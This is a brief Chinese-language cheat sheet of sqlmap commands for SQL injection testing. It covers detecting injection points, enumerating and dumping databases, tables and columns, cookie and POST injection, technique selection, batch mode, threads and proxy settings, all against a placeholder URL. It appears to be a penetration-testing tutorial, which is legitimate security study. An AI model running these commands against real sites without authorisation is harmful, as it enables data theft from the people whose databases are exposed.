sqlmap的基本使用

sqlmap的基本使用

一、注入

1、查询是否存在注入点

sqlmap -u "http://www.xx.com?id=x"

--dbs 检测有哪些数据库

--current-db 检测当前数据库

--tables -D "db_name" 获取db_name数据库中的表名

--columns -T "table_name" -D "db_name" 获取db_name数据库table_name表中的字段名

--dump -C "columns_name" -T "table_name" -D "db_name" 获取数据

2、cookie注入

sqlmap -u "http://www.xx.com?id=x" --cookie "cookie" --level 2

3、POST注入

用文本指定测试参数

sqlmap -r xxx.txt -p username （-p 指定测试的参数）

自动搜索表单

sqlmap -u "http://www.xx.com?id=x" --forms

url指定测试参数

sqlmap -u "http://www.xx.com?id=x" --data "username=1&password=1"

4、指定注入方式

指定联合注入

sqlmap -u "http://www.xx.com?id=x" --technique U

指定联合加布尔注入

sqlmap -u "http://www.xx.com?id=x" --technique UB

指定其他注入

U：联合注入

E：报错注入

B：布尔注入

T：延时注入

S：堆叠注入

5、自动选择默认提示

sqlmap -u "http://www.xx.com?id=x" --batch

6、指定线程数，最大线程数是10

sqlmap -u "http://www.xx.com?id=x" --thread 5

7、设置代理

sqlmap -u "http://www.xx.com?id=x" --proxy="http://127.0.0.1:8080"